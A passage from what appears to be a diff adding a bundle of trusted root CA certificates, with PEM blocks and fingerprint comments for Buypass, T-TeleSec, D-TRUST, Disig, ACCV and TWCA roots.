+AgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMmAd+BikoL1Rpzz +uvdMw964o605MA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAU18h +9bqwOlI5LJKwbADJ784g7wbylp7ppHR/ehb8t/W2+xUbP6umwHJdELFx7rxP462s +A20ucS6vxOOto70MEae0/0qyexAQH6dXQbLArvQsWdZHEIjzIVEpMMpghq9Gqx3t +OluwlN5E40EIosHsHdb9T7bWR9AUC8rmyrV7d35BH16Dx7aMOZawP5aBQW9gkOLo ++fsicdl9sz1Gv7SEr5AcD48Saq/v7h56rgJKihcrdv6sVIkkLE8/trKnToyokZf7 +KcZ7XC25y2a2t6hbElGFtQl+Ynhw/qlqYLYdDnkM/crqJIByw5c/8nerQyIKx+u2 +DISCLIBrQYoIwOula9+ZEsuK1V6ADJHgJgg2SMX6OBE1/yWDLfJ6v9r9jv6ly0Us +H8SIU653DtmadsWOLB2jutXsMq7Aqqz30XpN69QH4kj3Io6wpJ9qzo6ysmD0oyLQ +I+uUWnpp3Q+/QFesa1lQ2aOZ4W7+jQF5JyMV3pKdewlNWudLSDBaGOYKbeaP4NK7 +5t98biGCwWg5TbSYWGZizEqQXsP6JwSxeRV0mcy+rSDeJmAc61ZRpqPq5KM/p/9h +3PFaTWwyI0PurKju7koSCTxdccK+efrCh2gdC/1cacwG0Jp9VJkqyTkaGa9LKkPz +Y11aWOIv4x3kqdbQCtCev9eBCfHJxyYNrJgWVqA= +-----END CERTIFICATE----- + +# Issuer: CN=Buypass Class 3 Root CA O=Buypass AS-983163327 +# Subject: CN=Buypass Class 3 Root CA O=Buypass AS-983163327 +# Label: "Buypass Class 3 Root CA" +# Serial: 2 +# MD5 Fingerprint: 3d:3b:18:9e:2c:64:5a:e8:d5:88:ce:0e:f9:37:c2:ec +# SHA1 Fingerprint: da:fa:f7:fa:66:84:ec:06:8f:14:50:bd:c7:c2:81:a5:bc:a9:64:57 +# SHA256 Fingerprint: ed:f7:eb:bc:a2:7a:2a:38:4d:38:7b:7d:40:10:c6:66:e2:ed:b4:84:3e:4c:29:b4:ae:1d:5b:93:32:e6:b2:4d +-----BEGIN CERTIFICATE----- +MIIFWTCCA0GgAwIBAgIBAjANBgkqhkiG9w0BAQsFADBOMQswCQYDVQQGEwJOTzEd +MBsGA1UECgwUQnV5cGFzcyBBUy05ODMxNjMzMjcxIDAeBgNVBAMMF0J1eXBhc3Mg +Q2xhc3MgMyBSb290IENBMB4XDTEwMTAyNjA4Mjg1OFoXDTQwMTAyNjA4Mjg1OFow +TjELMAkGA1UEBhMCTk8xHTAbBgNVBAoMFEJ1eXBhc3MgQVMtOTgzMTYzMzI3MSAw +HgYDVQQDDBdCdXlwYXNzIENsYXNzIDMgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEB +BQADggIPADCCAgoCggIBAKXaCpUWUOOV8l6ddjEGMnqb8RB2uACatVI2zSRHsJ8Y +ZLya9vrVediQYkwiL944PdbgqOkcLNt4EemOaFEVcsfzM4fkoF0LXOBXByow9c3E +N3coTRiR5r/VUv1xLXA+58bEiuPwKAv0dpihi4dVsjoT/Lc+JzeOIuOoTyrvYLs9 +tznDDgFHmV0ST9tD+leh7fmdvhFHJlsTmKtdFoqwNxxXnUX/iJY2v7vKB3tvh2PX +0DJq1l1sDPGzbjniazEuOQAnFN44wOwZZoYS6J1yFhNkUsepNxz9gjDthBgd9K5c +/3ATAOux9TN6S9ZV+AWNS2mw9bMoNlwUxFFzTWsL8TQH2xc519woe2v1n/MuwU8X +KhDzzMro6/1rqy6any2CbgTUUgGTLT2G/H783+9CHaZr77kgxve9oKeV/afmiSTY +zIw0bOIjL9kSGiG5VZFvC5F5GQytQIgLcOJ60g7YaEi7ghM5EFjp2CoHxhLbWNvS +O1UQRwUVZ2J+GGOmRj8JDlQyXr8NYnon74Do29lLBlo3WiXQCBJ31G8JUJc9yB3D +34xFMFbG02SrZvPAXpacw8Tvw3xrizp5f7NJzz3iiZ+gMEuFuZyUJHmPfWupRWgP +K9Dx2hzLabjKSWJtyNBjYt1gD1iqj6G8BaVmos8bdrKEZLFMOVLAMLrwjEsCsLa3 +AgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFEe4zf/lb+74suwv +Tg75JbCOPGvDMA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAACAj +QTUEkMJAYmDv4jVM1z+s4jSQuKFvdvoWFqRINyzpkMLyPPgKn9iB5btb2iUspKdV +cSQy9sgL8rxq+JOssgfCX5/bzMiKqr5qb+FJEMwx14C7u8jYog5kV+qi9cKpMRXS +IGrs/CIBKM+GuIAeqcwRpTzyFrNHnfzSgCHEy9BHcEGhyoMZCCxt8l13nIoUE9Q2 +HJLw5QY33KbmkJs4j1xrG0aGQ0JfPgEHU1RdZX33inOhmlRaHylDFCfChQ+1iHsa +O5S3HWCntZznKWlXWpuTekMwGwPXYshApqr8ZORK15FTAaggiG6cX0S5y2CBNOxv +033aSF/rtJC8LakcC6wc1aJoIIAE1vyxjy+7SjENSoYc6+I2KSb12tjE8nVhz36u +dmNKekBlk4f4HoCMhuWG1o8O/FMsYOgWYRqiPkN7zTlgVGr18okmAWiDSKIz6MkE +kbIRNBE+6tBDGR8Dk5AM/1E9V/RBbuHLoL7ryWPNbczk+DaqaJ3tvV2XcEQNtg41 +3OEMXbugUZTLfhbrES+jkkXITHHZvMmZUldGL1DPvTVp9D0VzgalLA8+9oG6lLvD +u79leNKGef9JOxqDDPDeeOzI8k1MGt6CKfjBWtrt7uYnXuhF0J0cUahoq0Tj0Itq +4/g7u9xN12TyUb7mqqta6THuBrxzvxNiCp/HuZc= +-----END CERTIFICATE----- + +# Issuer: CN=T-TeleSec GlobalRoot Class 3 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center +# Subject: CN=T-TeleSec GlobalRoot Class 3 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center +# Label: "T-TeleSec GlobalRoot Class 3" +# Serial: 1 +# MD5 Fingerprint: ca:fb:40:a8:4e:39:92:8a:1d:fe:8e:2f:c4:27:ea:ef +# SHA1 Fingerprint: 55:a6:72:3e:cb:f2:ec:cd:c3:23:74:70:19:9d:2a:be:11:e3:81:d1 +# SHA256 Fingerprint: fd:73:da:d3:1c:64:4f:f1:b4:3b:ef:0c:cd:da:96:71:0b:9c:d9:87:5e:ca:7e:31:70:7a:f3:e9:6d:52:2b:bd +-----BEGIN CERTIFICATE----- +MIIDwzCCAqugAwIBAgIBATANBgkqhkiG9w0BAQsFADCBgjELMAkGA1UEBhMCREUx +KzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnByaXNlIFNlcnZpY2VzIEdtYkgxHzAd +BgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50ZXIxJTAjBgNVBAMMHFQtVGVsZVNl +YyBHbG9iYWxSb290IENsYXNzIDMwHhcNMDgxMDAxMTAyOTU2WhcNMzMxMDAxMjM1 +OTU5WjCBgjELMAkGA1UEBhMCREUxKzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnBy +aXNlIFNlcnZpY2VzIEdtYkgxHzAdBgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50 +ZXIxJTAjBgNVBAMMHFQtVGVsZVNlYyBHbG9iYWxSb290IENsYXNzIDMwggEiMA0G +CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC9dZPwYiJvJK7genasfb3ZJNW4t/zN +8ELg63iIVl6bmlQdTQyK9tPPcPRStdiTBONGhnFBSivwKixVA9ZIw+A5OO3yXDw/ +RLyTPWGrTs0NvvAgJ1gORH8EGoel15YUNpDQSXuhdfsaa3Ox+M6pCSzyU9XDFES4 +hqX2iys52qMzVNn6chr3IhUciJFrf2blw2qAsCTz34ZFiP0Zf3WHHx+xGwpzJFu5 +ZeAsVMhg02YXP+HMVDNzkQI6pn97djmiH5a2OK61yJN0HZ65tOVgnS9W0eDrXltM +EnAMbEQgqxHY9Bn20pxSN+f6tsIxO0rUFJmtxxr1XV/6B7h8DR/Wgx6zAgMBAAGj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBS1 +A/d2O2GCahKqGFPrAyGUv/7OyjANBgkqhkiG9w0BAQsFAAOCAQEAVj3vlNW92nOy +WL6ukK2YJ5f+AbGwUgC4TeQbIXQbfsDuXmkqJa9c1h3a0nnJ85cp4IaH3gRZD/FZ +1GSFS5mvJQQeyUapl96Cshtwn5z2r3Ex3XsFpSzTucpH9sry9uetuUg/vBa3wW30 +6gmv7PO15wWeph6KU1HWk4HMdJP2udqmJQV0eVp+QD6CSyYRMG7hP0HHRwA11fXT +91Q+gT3aSWqas+8QPebrb9HIIkfLzM8BMZLZGOMivgkeGj5asuRrDFR6fUNOuIml +e9eiPZaGzPImNC1qkp2aGtAw4l1OBLBfiyB+d8E9lYLRRpo7PHi4b6HQDWSieB4p +TpPDpFQUWw== +-----END CERTIFICATE----- + +# Issuer: CN=D-TRUST Root Class 3 CA 2 2009 O=D-Trust GmbH +# Subject: CN=D-TRUST Root Class 3 CA 2 2009 O=D-Trust GmbH +# Label: "D-TRUST Root Class 3 CA 2 2009" +# Serial: 623603 +# MD5 Fingerprint: cd:e0:25:69:8d:47:ac:9c:89:35:90:f7:fd:51:3d:2f +# SHA1 Fingerprint: 58:e8:ab:b0:36:15:33:fb:80:f7:9b:1b:6d:29:d3:ff:8d:5f:00:f0 +# SHA256 Fingerprint: 49:e7:a4:42:ac:f0:ea:62:87:05:00:54:b5:25:64:b6:50:e4:f4:9e:42:e3:48:d6:aa:38:e0:39:e9:57:b1:c1 +-----BEGIN CERTIFICATE----- +MIIEMzCCAxugAwIBAgIDCYPzMA0GCSqGSIb3DQEBCwUAME0xCzAJBgNVBAYTAkRF +MRUwEwYDVQQKDAxELVRydXN0IEdtYkgxJzAlBgNVBAMMHkQtVFJVU1QgUm9vdCBD +bGFzcyAzIENBIDIgMjAwOTAeFw0wOTExMDUwODM1NThaFw0yOTExMDUwODM1NTha +ME0xCzAJBgNVBAYTAkRFMRUwEwYDVQQKDAxELVRydXN0IEdtYkgxJzAlBgNVBAMM +HkQtVFJVU1QgUm9vdCBDbGFzcyAzIENBIDIgMjAwOTCCASIwDQYJKoZIhvcNAQEB +BQADggEPADCCAQoCggEBANOySs96R+91myP6Oi/WUEWJNTrGa9v+2wBoqOADER03 +UAifTUpolDWzU9GUY6cgVq/eUXjsKj3zSEhQPgrfRlWLJ23DEE0NkVJD2IfgXU42 +tSHKXzlABF9bfsyjxiupQB7ZNoTWSPOSHjRGICTBpFGOShrvUD9pXRl/RcPHAY9R +ySPocq60vFYJfxLLHLGvKZAKyVXMD9O0Gu1HNVpK7ZxzBCHQqr0ME7UAyiZsxGsM +lFqVlNpQmvH/pStmMaTJOKDfHR+4CS7zp+hnUquVH+BGPtikw8paxTGA6Eian5Rp +/hnd2HN8gcqW3o7tszIFZYQ05ub9VxC1X3a/L7AQDcUCAwEAAaOCARowggEWMA8G +A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFP3aFMSfMN4hvR5COfyrYyNJ4PGEMA4G +A1UdDwEB/wQEAwIBBjCB0wYDVR0fBIHLMIHIMIGAoH6gfIZ6bGRhcDovL2RpcmVj +dG9yeS5kLXRydXN0Lm5ldC9DTj1ELVRSVVNUJTIwUm9vdCUyMENsYXNzJTIwMyUy +MENBJTIwMiUyMDIwMDksTz1ELVRydXN0JTIwR21iSCxDPURFP2NlcnRpZmljYXRl +cmV2b2NhdGlvbmxpc3QwQ6BBoD+GPWh0dHA6Ly93d3cuZC10cnVzdC5uZXQvY3Js +L2QtdHJ1c3Rfcm9vdF9jbGFzc18zX2NhXzJfMjAwOS5jcmwwDQYJKoZIhvcNAQEL +BQADggEBAH+X2zDI36ScfSF6gHDOFBJpiBSVYEQBrLLpME+bUMJm2H6NMLVwMeni +acfzcNsgFYbQDfC+rAF1hM5+n02/t2A7nPPKHeJeaNijnZflQGDSNiH+0LS4F9p0 +o3/U37CYAqxva2ssJSRyoWXuJVrl5jLn8t+rSfrzkGkj2wTZ51xY/GXUl77M/C4K +zCUqNQT4YJEVdT1B/yMfGchs64JTBKbkTCJNjYy6zltz7GRUUG3RnFX7acM2w4y8 +PIWmawomDeCTmGCufsYkl4phX5GOZpIJhzbNi5stPvZR1FDUWSi9g/LMKHtThm3Y +Johw1+qRzT65ysCQblrGXnRl11z+o+I= +-----END CERTIFICATE----- + +# Issuer: CN=D-TRUST Root Class 3 CA 2 EV 2009 O=D-Trust GmbH +# Subject: CN=D-TRUST Root Class 3 CA 2 EV 2009 O=D-Trust GmbH +# Label: "D-TRUST Root Class 3 CA 2 EV 2009" +# Serial: 623604 +# MD5 Fingerprint: aa:c6:43:2c:5e:2d:cd:c4:34:c0:50:4f:11:02:4f:b6 +# SHA1 Fingerprint: 96:c9:1b:0b:95:b4:10:98:42:fa:d0:d8:22:79:fe:60:fa:b9:16:83 +# SHA256 Fingerprint: ee:c5:49:6b:98:8c:e9:86:25:b9:34:09:2e:ec:29:08:be:d0:b0:f3:16:c2:d4:73:0c:84:ea:f1:f3:d3:48:81 +-----BEGIN CERTIFICATE----- +MIIEQzCCAyugAwIBAgIDCYP0MA0GCSqGSIb3DQEBCwUAMFAxCzAJBgNVBAYTAkRF +MRUwEwYDVQQKDAxELVRydXN0IEdtYkgxKjAoBgNVBAMMIUQtVFJVU1QgUm9vdCBD +bGFzcyAzIENBIDIgRVYgMjAwOTAeFw0wOTExMDUwODUwNDZaFw0yOTExMDUwODUw +NDZaMFAxCzAJBgNVBAYTAkRFMRUwEwYDVQQKDAxELVRydXN0IEdtYkgxKjAoBgNV +BAMMIUQtVFJVU1QgUm9vdCBDbGFzcyAzIENBIDIgRVYgMjAwOTCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAJnxhDRwui+3MKCOvXwEz75ivJn9gpfSegpn +ljgJ9hBOlSJzmY3aFS3nBfwZcyK3jpgAvDw9rKFs+9Z5JUut8Mxk2og+KbgPCdM0 +3TP1YtHhzRnp7hhPTFiu4h7WDFsVWtg6uMQYZB7jM7K1iXdODL/ZlGsTl28So/6Z +qQTMFexgaDbtCHu39b+T7WYxg4zGcTSHThfqr4uRjRxWQa4iN1438h3Z0S0NL2lR +p75mpoo6Kr3HGrHhFPC+Oh25z1uxav60sUYgovseO3Dvk5h9jHOW8sXvhXCtKSb8 +HgQ+HKDYD8tSg2J87otTlZCpV6LqYQXY+U3EJ/pure3511H3a6UCAwEAAaOCASQw +ggEgMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNOUikxiEyoZLsyvcop9Ntea +HNxnMA4GA1UdDwEB/wQEAwIBBjCB3QYDVR0fBIHVMIHSMIGHoIGEoIGBhn9sZGFw +Oi8vZGlyZWN0b3J5LmQtdHJ1c3QubmV0L0NOPUQtVFJVU1QlMjBSb290JTIwQ2xh +c3MlMjAzJTIwQ0ElMjAyJTIwRVYlMjAyMDA5LE89RC1UcnVzdCUyMEdtYkgsQz1E +RT9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0MEagRKBChkBodHRwOi8vd3d3LmQt +dHJ1c3QubmV0L2NybC9kLXRydXN0X3Jvb3RfY2xhc3NfM19jYV8yX2V2XzIwMDku +Y3JsMA0GCSqGSIb3DQEBCwUAA4IBAQA07XtaPKSUiO8aEXUHL7P+PPoeUSbrh/Yp +3uDx1MYkCenBz1UbtDDZzhr+BlGmFaQt77JLvyAoJUnRpjZ3NOhk31KxEcdzes05 +nsKtjHEh8lprr988TlWvsoRlFIm5d8sqMb7Po23Pb0iUMkZv53GMoKaEGTcH8gNF +CSuGdXzfX2lXANtu2KZyIktQ1HWYVt+3GP9DQ1CuekR78HlR10M9p9OB0/DJT7na +xpeG0ILD5EJt/rDiZE4OJudANCa1CInXCGNjOCd1HjPqbqjdn5lPdE2BiYBL3ZqX +KVwvvoFBuYz/6n1gBp7N1z3TLqMVvKjmJuVvw9y4AyHqnxbxLFS1 +-----END CERTIFICATE----- + +# Issuer: CN=CA Disig Root R2 O=Disig a.s. +# Subject: CN=CA Disig Root R2 O=Disig a.s. +# Label: "CA Disig Root R2" +# Serial: 10572350602393338211 +# MD5 Fingerprint: 26:01:fb:d8:27:a7:17:9a:45:54:38:1a:43:01:3b:03 +# SHA1 Fingerprint: b5:61:eb:ea:a4:de:e4:25:4b:69:1a:98:a5:57:47:c2:34:c7:d9:71 +# SHA256 Fingerprint: e2:3d:4a:03:6d:7b:70:e9:f5:95:b1:42:20:79:d2:b9:1e:df:bb:1f:b6:51:a0:63:3e:aa:8a:9d:c5:f8:07:03 +-----BEGIN CERTIFICATE----- +MIIFaTCCA1GgAwIBAgIJAJK4iNuwisFjMA0GCSqGSIb3DQEBCwUAMFIxCzAJBgNV +BAYTAlNLMRMwEQYDVQQHEwpCcmF0aXNsYXZhMRMwEQYDVQQKEwpEaXNpZyBhLnMu +MRkwFwYDVQQDExBDQSBEaXNpZyBSb290IFIyMB4XDTEyMDcxOTA5MTUzMFoXDTQy +MDcxOTA5MTUzMFowUjELMAkGA1UEBhMCU0sxEzARBgNVBAcTCkJyYXRpc2xhdmEx +EzARBgNVBAoTCkRpc2lnIGEucy4xGTAXBgNVBAMTEENBIERpc2lnIFJvb3QgUjIw +ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCio8QACdaFXS1tFPbCw3Oe +NcJxVX6B+6tGUODBfEl45qt5WDza/3wcn9iXAng+a0EE6UG9vgMsRfYvZNSrXaNH +PWSb6WiaxswbP7q+sos0Ai6YVRn8jG+qX9pMzk0DIaPY0jSTVpbLTAwAFjxfGs3I +x2ymrdMxp7zo5eFm1tL7A7RBZckQrg4FY8aAamkw/dLukO8NJ9+flXP04SXabBbe +QTg06ov80egEFGEtQX6sx3dOy1FU+16SGBsEWmjGycT6txOgmLcRK7fWV8x8nhfR +yyX+hk4kLlYMeE2eARKmK6cBZW58Yh2EhN/qwGu1pSqVg8NTEQxzHQuyRpDRQjrO +QG6Vrf/GlK1ul4SOfW+eioANSW1z4nuSHsPzwfPrLgVv2RvPN3YEyLRa5Beny912 +H9AZdugsBbPWnDTYltxhh5EF5EQIM8HauQhl1K6yNg3ruji6DOWbnuuNZt2Zz9aJ +QfYEkoopKW1rOhzndX0CcQ7zwOe9yxndnWCywmZgtrEE7snmhrmaZkCo5xHtgUUD +i/ZnWejBBhG93c+AAk9lQHhcR1DIm+YfgXvkRKhbhZri3lrVx/k6RGZL5DJUfORs +nLMOPReisjQS1n6yqEm70XooQL6iFh/f5DcfEXP7kAplQ6INfPgGAVUzfbANuPT1 +rqVCV3w2EYx7XsQDnYx5nQIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud +DwEB/wQEAwIBBjAdBgNVHQ4EFgQUtZn4r7CU9eMg1gqtzk5WpC5uQu0wDQYJKoZI +hvcNAQELBQADggIBACYGXnDnZTPIgm7ZnBc6G3pmsgH2eDtpXi/q/075KMOYKmFM +tCQSin1tERT3nLXK5ryeJ45MGcipvXrA1zYObYVybqjGom32+nNjf7xueQgcnYqf +GopTpti72TVVsRHFqQOzVju5hJMiXn7B9hJSi+osZ7z+Nkz1uM/Rs0mSO9MpDpkb +lvdhuDvEK7Z4bLQjb/D907JedR+Zlais9trhxTF7+9FGs9K8Z7RiVLoJ92Owk6Ka ++elSLotgEqv89WBW7xBci8QaQtyDW2QOy7W81k/BfDxujRNt+3vrMNDcTa/F1bal +TFtxyegxvug4BkihGuLq0t4SOVga/4AOgnXmt8kHbA7v/zjxmHHEt38OFdAlab0i +nSvtBfZGR6ztwPDUO+Ls7pZbkBNOHlY667DvlruWIxG68kOGdGSVyCh13x01utI3 +gzhTODY7z2zp+WsO0PsE6E9312UBeIYMej4hYvF/Y3EMyZ9E26gnonW+boE+18Dr +G5gPcFw0sorMwIUY6256s/daoQe/qUKS82Ail+QUoQebTnbAjn39pCXHR+3/H3Os +zMOl6W8KjptlwlCFtaOgUxLMVYdh84GuEEZhvUQhuMI9dM9+JDX6HAcOmz0iyu8x +L4ysEr3vQCj8KWefshNPZiTEUxnpHikV7+ZtsH8tZ/3zbBt1RqPlShfppNcL +-----END CERTIFICATE----- + +# Issuer: CN=ACCVRAIZ1 O=ACCV OU=PKIACCV +# Subject: CN=ACCVRAIZ1 O=ACCV OU=PKIACCV +# Label: "ACCVRAIZ1" +# Serial: 6828503384748696800 +# MD5 Fingerprint: d0:a0:5a:ee:05:b6:09:94:21:a1:7d:f1:b2:29:82:02 +# SHA1 Fingerprint: 93:05:7a:88:15:c6:4f:ce:88:2f:fa:91:16:52:28:78:bc:53:64:17 +# SHA256 Fingerprint: 9a:6e:c0:12:e1:a7:da:9d:be:34:19:4d:47:8a:d7:c0:db:18:22:fb:07:1d:f1:29:81:49:6e:d1:04:38:41:13 +-----BEGIN CERTIFICATE----- +MIIH0zCCBbugAwIBAgIIXsO3pkN/pOAwDQYJKoZIhvcNAQEFBQAwQjESMBAGA1UE +AwwJQUNDVlJBSVoxMRAwDgYDVQQLDAdQS0lBQ0NWMQ0wCwYDVQQKDARBQ0NWMQsw +CQYDVQQGEwJFUzAeFw0xMTA1MDUwOTM3MzdaFw0zMDEyMzEwOTM3MzdaMEIxEjAQ +BgNVBAMMCUFDQ1ZSQUlaMTEQMA4GA1UECwwHUEtJQUNDVjENMAsGA1UECgwEQUND +VjELMAkGA1UEBhMCRVMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCb +qau/YUqXry+XZpp0X9DZlv3P4uRm7x8fRzPCRKPfmt4ftVTdFXxpNRFvu8gMjmoY +HtiP2Ra8EEg2XPBjs5BaXCQ316PWywlxufEBcoSwfdtNgM3802/J+Nq2DoLSRYWo +G2ioPej0RGy9ocLLA76MPhMAhN9KSMDjIgro6TenGEyxCQ0jVn8ETdkXhBilyNpA +lHPrzg5XPAOBOp0KoVdDaaxXbXmQeOW1tDvYvEyNKKGno6e6Ak4l0Squ7a4DIrhr +IA8wKFSVf+DuzgpmndFALW4ir50awQUZ0m/A8p/4e7MCQvtQqR0tkw8jq8bBD5L/ +0KIV9VMJcRz/RROE5iZe+OCIHAr8Fraocwa48GOEAqDGWuzndN9wrqODJerWx5eH +k6fGioozl2A3ED6XPm4pFdahD9GILBKfb6qkxkLrQaLjlUPTAYVtjrs78yM2x/47 +4KElB0iryYl0/wiPgL/AlmXz7uxLaL2diMMxs0Dx6M/2OLuc5NF/1OVYm3z61PMO +m3WR5LpSLhl+0fXNWhn8ugb2+1KoS5kE3fj5tItQo05iifCHJPqDQsGH+tUtKSpa +cXpkatcnYGMN285J9Y0fkIkyF/hzQ7jSWpOGYdbhdQrqeWZ2iE9x6wQl1gpaepPl +uUsXQA+xtrn13k/c4LOsOxFwYIRKQ26ZIMApcQrAZQIDAQABo4ICyzCCAscwfQYI +KwYBBQUHAQEEcTBvMEwGCCsGAQUFBzAChkBodHRwOi8vd3d3LmFjY3YuZXMvZmls +ZWFkbWluL0FyY2hpdm9zL2NlcnRpZmljYWRvcy9yYWl6YWNjdjEuY3J0MB8GCCsG +AQUFBzABhhNodHRwOi8vb2NzcC5hY2N2LmVzMB0GA1UdDgQWBBTSh7Tj3zcnk1X2 +VuqB5TbMjB4/vTAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNKHtOPfNyeT +VfZW6oHlNsyMHj+9MIIBcwYDVR0gBIIBajCCAWYwggFiBgRVHSAAMIIBWDCCASIG +CCsGAQUFBwICMIIBFB6CARAAQQB1AHQAbwByAGkAZABhAGQAIABkAGUAIABDAGUA +cgB0AGkAZgBpAGMAYQBjAGkA8wBuACAAUgBhAO0AegAgAGQAZQAgAGwAYQAgAEEA +QwBDAFYAIAAoAEEAZwBlAG4AYwBpAGEAIABkAGUAIABUAGUAYwBuAG8AbABvAGcA +7QBhACAAeQAgAEMAZQByAHQAaQBmAGkAYwBhAGMAaQDzAG4AIABFAGwAZQBjAHQA +cgDzAG4AaQBjAGEALAAgAEMASQBGACAAUQA0ADYAMAAxADEANQA2AEUAKQAuACAA +QwBQAFMAIABlAG4AIABoAHQAdABwADoALwAvAHcAdwB3AC4AYQBjAGMAdgAuAGUA +czAwBggrBgEFBQcCARYkaHR0cDovL3d3dy5hY2N2LmVzL2xlZ2lzbGFjaW9uX2Mu +aHRtMFUGA1UdHwROMEwwSqBIoEaGRGh0dHA6Ly93d3cuYWNjdi5lcy9maWxlYWRt +aW4vQXJjaGl2b3MvY2VydGlmaWNhZG9zL3JhaXphY2N2MV9kZXIuY3JsMA4GA1Ud +DwEB/wQEAwIBBjAXBgNVHREEEDAOgQxhY2N2QGFjY3YuZXMwDQYJKoZIhvcNAQEF +BQADggIBAJcxAp/n/UNnSEQU5CmH7UwoZtCPNdpNYbdKl02125DgBS4OxnnQ8pdp +D70ER9m+27Up2pvZrqmZ1dM8MJP1jaGo/AaNRPTKFpV8M9xii6g3+CfYCS0b78gU +JyCpZET/LtZ1qmxNYEAZSUNUY9rizLpm5U9EelvZaoErQNV/+QEnWCzI7UiRfD+m +AM/EKXMRNt6GGT6d7hmKG9Ww7Y49nCrADdg9ZuM8Db3VlFzi4qc1GwQA9j9ajepD +vV+JHanBsMyZ4k0ACtrJJ1vnE5Bc5PUzolVt3OAJTS+xJlsndQAJxGJ3KQhfnlms +tn6tn1QwIgPBHnFk/vk4CpYY3QIUrCPLBhwepH2NDd4nQeit2hW3sCPdK6jT2iWH +7ehVRE2I9DZ+hJp4rPcOVkkO1jMl1oRQQmwgEh0q1b688nCBpHBgvgW1m54ERL5h +I6zppSSMEYCUWqKiuUnSwdzRp+0xESyeGabu4VXhwOrPDYTkF7eifKXeVSUG7szA +h1xA2syVP1XgNce4hL60Xc16gwFy7ofmXx2utYXGJt/mwZrpHgJHnyqobalbz+xF +d3+YJ5oyXSrjhO7FmGYvliAd3djDJ9ew+f7Zfc3Qn48LFFhRny+Lwzgt3uiP1o2H +pPVWQxaZLPSkVrQ0uGE3ycJYgBugl6H8WY3pEfbRD0tVNEYqi4Y7 +-----END CERTIFICATE----- + +# Issuer: CN=TWCA Global Root CA O=TAIWAN-CA OU=Root CA +# Subject: CN=TWCA Global Root CA O=TAIWAN-CA OU=Root CA +# Label: "TWCA Global Root CA" +# Serial: 3262 +# MD5 Fingerprint: f9:03:7e:cf:e6:9e:3c:73:7a:2a:90:07:69:ff:2b:96 +# SHA1 Fingerprint: 9c:bb:48:53:f6:a4:f6:d3:52:a4:e8:32:52:55:60:13:f5:ad:af:65 +# SHA256 Fingerprint: 59:76:90:07:f7:68:5d:0f:cd:50:87:2f:9f:95:d5:75:5a:5b:2b:45:7d:81:f3:69:2b:61:0a:98:67:2f:0e:1b +-----BEGIN CERTIFICATE----- +MIIFQTCCAymgAwIBAgICDL4wDQYJKoZIhvcNAQELBQAwUTELMAkGA1UEBhMCVFcx +EjAQBgNVBAoTCVRBSVdBTi1DQTEQMA4GA1UECxMHUm9vdCBDQTEcMBoGA1UEAxMT +VFdDQSBHbG9iYWwgUm9vdCBDQTAeFw0xMjA2MjcwNjI4MzNaFw0zMDEyMzExNTU5 +NTlaMFExCzAJBgNVBAYTAlRXMRIwEAYDVQQKEwlUQUlXQU4tQ0ExEDAOBgNVBAsT +B1Jvb3QgQ0ExHDAaBgNVBAMTE1RXQ0EgR2xvYmFsIFJvb3QgQ0EwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCwBdvI64zEbooh745NnHEKH1Jw7W2CnJfF +10xORUnLQEK1EjRsGcJ0pDFfhQKX7EMzClPSnIyOt7h52yvVavKOZsTuKwEHktSz +0ALfUPZVr2YOy+BHYC8rMjk1Ujoog/h7FsYYuGLWRyWRzvAZEk2tY/XTP3VfKfCh +MBwqoJimFb3u/Rk28OKRQ4/6ytYQJ0lM793B8YVwm8rqqFpD/G2Gb3PpN0Wp8DbH +zIh1HrtsBv+baz4X7GGqcXzGHaL3SekVtTzWoWH1EfcFbx39Eb7QMAfCKbAJTibc +46KokWofwpFFiFzlmLhxpRUZyXx1EcxwdE8tmx2RRP1WKKD+u4ZqyPpcC1jcxkt2 +yKsi2XMPpfRaAok/T54igu6idFMqPVMnaR1sjjIsZAAmY2E2TqNGtz99sy2sbZCi +laLOz9qC5wc0GZbpuCGqKX6mOL6OKUohZnkfs8O1CWfe1tQHRvMq2uYiN2DLgbYP +oA/pyJV/v1WRBXrPPRXAb94JlAGD1zQbzECl8LibZ9WYkTunhHiVJqRaCPgrdLQA +BDzfuBSO6N+pjWxnkjMdwLfS7JLIvgm/LCkFbwJrnu+8vyq8W8BQj0FwcYeyTbcE +qYSjMq+u7msXi7Kx/mzhkIyIqJdIzshNy/MGz19qCkKxHh53L46g5pIOBvwFItIm +4TFRfTLcDwIDAQABoyMwITAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB +/zANBgkqhkiG9w0BAQsFAAOCAgEAXzSBdu+WHdXltdkCY4QWwa6gcFGn90xHNcgL +1yg9iXHZqjNB6hQbbCEAwGxCGX6faVsgQt+i0trEfJdLjbDorMjupWkEmQqSpqsn +LhpNgb+E1HAerUf+/UqdM+DyucRFCCEK2mlpc3INvjT+lIutwx4116KD7+U4x6WF +H6vPNOw/KP4M8VeGTslV9xzU2KV9Bnpv1d8Q34FOIWWxtuEXeZVFBs5fzNxGiWNo +RI2T9GRwoD2dKAXDOXC4Ynsg/eTb6QihuJ49CcdP+yz4k3ZB3lLg4VfSnQO8d57+ 